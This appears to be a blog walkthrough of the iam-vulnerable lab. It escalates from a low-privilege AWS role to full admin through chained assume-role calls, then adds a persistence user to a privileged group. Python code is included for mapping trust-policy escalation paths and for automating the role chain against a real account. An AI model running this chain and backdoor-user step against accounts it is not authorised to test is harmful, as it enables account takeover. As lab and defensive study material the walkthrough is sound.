One of the most common ways to escalate privilege illicitly in AWS is with weak or stolen credentials. The credentials can be pilfered from an unsecured repository, phished, or obtained in other ways. One of the bad or good things, depending on perspective, about long-lived credentials like console passwords and IAM user access keys (access key ID plus secret access key) is how long they stay useful: they have no built-in expiration, so an attacker who obtains them can keep using them until someone notices and rotates them.
AWS role assumption, by contrast, hands out temporary credentials just in time and only to trusted entities. See the STS AssumeRole API reference: https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html
The temporary nature of the credentials makes things much more secure, but role assumption can still be abused. Improperly configured IAM policies can grant a role excessive permissions, and an overly permissive trust policy can let far more principals assume it than intended.
We can demo some abusive role assumptions using iam-vulnerable from BishopFox. https://github.com/BishopFox/iam-vulnerable
This sets up 31 users, roles, and policies covering a variety of methods for gaining access to the targeted account. You can run it in an entirely free mode or enable other modules that may generate a cost. Bishop Fox estimates those optional costs here: https://github.com/BishopFox/iam-vulnerable?tab=readme-ov-file#detailed-usage-instructions.
Iam-vulnerable sets up a large number of privilege escalation use cases: attaching new IAM permissions to other users, passing roles to services, changing permissions on existing policies, and more. Today I wanted to test the STS-AssumeRole module. A linked blog article from n00 gives more detail on this and the other IAM privilege escalation scenarios in the project: https://pswalia2u.medium.com/aws-iam-privilege-escalation-paths-cba36be1aa9e.
Among the roles provided by iam-vulnerable are three of increasing privilege, from low to high.
The starting role can be assumed by your configured testing user and has no permissions of its own. The starting role, however, is trusted to assume the intermediate role.
The intermediate role, in turn, is trusted to assume the ending role.
The ending role has a policy that allows everything, which is full administrative access to the account.
To ride this train to high privilege, we start with the usual enumeration to figure out who we are (aws sts get-caller-identity) and what we can do. Good places to look for enumeration commands are:
https://docs.aws.amazon.com/cli/latest/reference/
https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-iam-enum
Doing this by hand can take quite a while, or you can automate it with tools and scripts. More on that to come.
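The chain in this lab exists because each role's trust policy names the previous hop as a trusted principal. The following is an added example, not part of iam-vulnerable or the blog's own tooling, that shows the enumeration step in code: given a set of role trust policies (constructed here, with a placeholder account ID and role names mirroring the lab), it builds the principal-to-role graph and searches for the shortest assume-role chain from a starting principal to a target role. It also flags roles whose trust policy names the "*" principal, which anyone can assume. It only evaluates trust policies; in a real account, identity-based policies and explicit Denies can add or remove edges.

```python
"""Added example: find assume-role chains by walking role trust policies."""
from collections import deque

# Constructed sample data. The account id is a placeholder; the role names
# mirror the iam-vulnerable lab, but the policy documents themselves are mine.
ACCOUNT = "111122223333"
USER = f"arn:aws:iam::{ACCOUNT}:user/tester"
START = f"arn:aws:iam::{ACCOUNT}:role/privesc-AssumeRole-starting-role"
MIDDLE = f"arn:aws:iam::{ACCOUNT}:role/privesc-AssumeRole-intermediate-role"
END = f"arn:aws:iam::{ACCOUNT}:role/privesc-AssumeRole-ending-role"
OPEN = f"arn:aws:iam::{ACCOUNT}:role/wide-open-role"  # hypothetical misconfigured role


def trust(principals, action="sts:AssumeRole"):
    """Build a minimal trust policy allowing `principals` to assume the role."""
    return {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Principal": {"AWS": principals}, "Action": action}]}


TRUST_POLICIES = {
    START: trust(USER),        # the testing user may assume the starting role
    MIDDLE: trust([START]),    # the starting role may assume the intermediate role
    END: trust([MIDDLE]),      # the intermediate role may assume the ending role
    OPEN: trust("*"),          # any AWS principal may assume this one
}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def trusted_principals(policy):
    """Set of AWS principal ARNs (or '*') that an Allow statement lets call
    sts:AssumeRole. Only the trust policy is evaluated; identity-based
    policies and explicit Denies are not modelled here."""
    allowed = set()
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        actions = {a.lower() for a in _as_list(stmt.get("Action", []))}
        if not actions & {"sts:assumerole", "sts:*", "*"}:
            continue
        principal = stmt.get("Principal", {})
        if principal == "*":
            allowed.add("*")
            continue
        allowed.update(_as_list(principal.get("AWS", [])))
    return allowed


def trust_graph(policies):
    """Map each principal to the set of roles it may assume (principal -> role edges)."""
    graph = {}
    for role, policy in policies.items():
        for principal in trusted_principals(policy):
            graph.setdefault(principal, set()).add(role)
    return graph


def assume_chains(policies, start, target):
    """Shortest chain of AssumeRole hops from `start` to `target`, or None.
    Roles that trust '*' are reachable from every principal, so they are
    added as neighbours of every node."""
    graph = trust_graph(policies)
    everyone = graph.get("*", set())
    queue, seen = deque([[start]]), {start}
    while queue:
        path = queue.popleft()
        if path[-1] == target:
            return path
        for nxt in graph.get(path[-1], set()) | everyone:
            if nxt not in seen:
                seen.add(nxt)
                queue.append(path + [nxt])
    return None


def wide_open_roles(policies):
    """Roles whose trust policy names the '*' principal: anyone can assume them."""
    return sorted(r for r, p in policies.items() if "*" in trusted_principals(p))


if __name__ == "__main__":
    print(" -> ".join(assume_chains(TRUST_POLICIES, USER, END)))
    print("wide open:", wide_open_roles(TRUST_POLICIES))
```

To run this against a real account, feed it the documents returned by iam list-roles (the AssumeRolePolicyDocument field) instead of the constructed dictionary; the search itself does not change.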
- Finally, we uncover potential victims and are ready to abuse some trust. In this lab, the initial target is the low privileged starting role, which our configured testing user is allowed to assume:
aws sts assume-role --role-arn "arn:aws:iam::youraccountid:role/privesc-AssumeRole-starting-role" --role-session-name 'aa2'
where youraccountid is your 12-digit account ID; name the session whatever you want, of course.
We add the credentials returned by the assume-role call to a new profile in the AWS credentials file (~/.aws/credentials). Since it is an assumed role, the output also includes a session token that must go into the same profile as aws_session_token. Note that aws configure prompts only for the access key ID and secret access key, so the token has to be set separately (or the profile edited by hand):
aws configure --profile startingrole
aws configure set aws_session_token <SessionToken from the assume-role output> --profile startingrole
- We use the "startingrole" profile to assume the intermediate privileged role, then enter the intermediate credentials (key ID, secret key and session token) into a new profile:
aws sts assume-role --role-arn "arn:aws:iam::youraccountid:role/privesc-AssumeRole-intermediate-role" --role-session-name 'ab2' --profile startingrole
aws configure --profile middlerole
- The "middlerole" profile can now assume the high privileged role:
aws sts assume-role --role-arn "arn:aws:iam::youraccountid:role/privesc-AssumeRole-ending-role" --role-session-name 'aa4' --profile middlerole
Now we add the high privileged role's credentials to our credentials file, session token included:
aws configure --profile everything
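The three assume-role calls above are the same operation repeated with the previous hop's credentials. As an added example, not the page's own commands, here is that chain written in code: each hop's temporary credentials (including the session token) are fed into the next STS call, and every hop is written to its own profile in a credentials file. The STS client is injected through a factory so the logic runs offline against a constructed stand-in; boto3_factory is the real-account equivalent and assumes boto3 is installed with a default profile configured. The account ID is a placeholder. One caveat the code enforces: when a role is assumed using credentials that came from another role (role chaining), STS caps the session at one hour, so asking for longer on any hop after the first fails.

```python
"""Added example: walk an assume-role chain and write each hop to a profile."""
import configparser
import tempfile
from pathlib import Path

CHAIN_CAP = 3600  # role chaining limits each chained session to one hour
ACCOUNT = "111122223333"  # placeholder account id
ROLES = [f"arn:aws:iam::{ACCOUNT}:role/privesc-AssumeRole-{n}-role"
         for n in ("starting", "intermediate", "ending")]
PROFILES = ["startingrole", "middlerole", "everything"]


def assume_chain(sts_factory, role_arns, session_prefix="hop", duration=3600):
    """Assume `role_arns` in order. `sts_factory(creds)` returns an object whose
    assume_role(**kwargs) mimics boto3's STS client; creds is None for the first
    hop (the caller's own identity) and the previous hop's Credentials dict after
    that. Returns [(role_arn, credentials), ...]."""
    creds, hops = None, []
    for i, arn in enumerate(role_arns):
        # Only the first hop may exceed an hour; chained hops are capped by STS.
        secs = duration if creds is None else min(duration, CHAIN_CAP)
        resp = sts_factory(creds).assume_role(
            RoleArn=arn, RoleSessionName=f"{session_prefix}{i}", DurationSeconds=secs)
        creds = resp["Credentials"]
        hops.append((arn, creds))
    return hops


def write_profiles(hops, names, path):
    """Store each hop as a [name] section in an AWS-style credentials file.
    The session token is written too: without it the temporary keys are useless."""
    cfg = configparser.ConfigParser()
    path = Path(path)
    if path.exists():
        cfg.read(path)
    for (_, c), name in zip(hops, names):
        cfg[name] = {"aws_access_key_id": c["AccessKeyId"],
                     "aws_secret_access_key": c["SecretAccessKey"],
                     "aws_session_token": c["SessionToken"]}
    with path.open("w") as fh:
        cfg.write(fh)
    return cfg


def boto3_factory(creds):
    """Real STS factory: assumes boto3 is installed and a default profile exists."""
    import boto3
    if creds is None:
        return boto3.client("sts")
    return boto3.client("sts", aws_access_key_id=creds["AccessKeyId"],
                        aws_secret_access_key=creds["SecretAccessKey"],
                        aws_session_token=creds["SessionToken"])


class FakeSTS:
    """Constructed stand-in for STS: each role trusts only the previous role's
    session, so hops taken out of order, or chained hops asking for more than
    an hour, are refused the way a real trust policy / STS would refuse them."""
    def __init__(self, chain, creds):
        self.chain = chain
        self.caller = (creds or {}).get("SessionToken")

    def assume_role(self, RoleArn, RoleSessionName, DurationSeconds):
        idx = self.chain.index(RoleArn)
        expected = None if idx == 0 else f"token-{idx - 1}"
        if self.caller != expected or (idx > 0 and DurationSeconds > CHAIN_CAP):
            raise PermissionError(f"AccessDenied: cannot assume {RoleArn}")
        return {"Credentials": {"AccessKeyId": f"ASIA{idx}",
                                "SecretAccessKey": f"secret-{idx}",
                                "SessionToken": f"token-{idx}",
                                "Expiration": "constructed"}}


def demo(path=None):
    """Run the lab chain against the fake STS and write the three profiles."""
    path = path or Path(tempfile.mkdtemp()) / "credentials"
    hops = assume_chain(lambda c: FakeSTS(ROLES, c), ROLES)
    return write_profiles(hops, PROFILES, path)


if __name__ == "__main__":
    cfg = demo()
    print({s: cfg[s]["aws_session_token"] for s in cfg.sections()})
```

Swap the lambda in demo for boto3_factory to run it for real; the one-hour cap on chained hops is why the lab's middle and ending sessions expire sooner than a direct assume-role from a user might.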
Now I can complete my evil master plan using the high privileged profile.
In this case, create a new user and add them to a privileged group. (JustinBieber is my newly inherited diabetic cat, who manages to escalate his privileges into every Amazon box he can find.) Both commands have to run under the high privileged profile; without --profile everything the second one would go out under the default profile:
aws iam create-user --user-name JustinBieber --profile everything
aws iam add-user-to-group --group-name privesc-sre-group --user-name JustinBieber --profile everything
Here’s to creating your own evil master plan, abusing trust and assuming roles.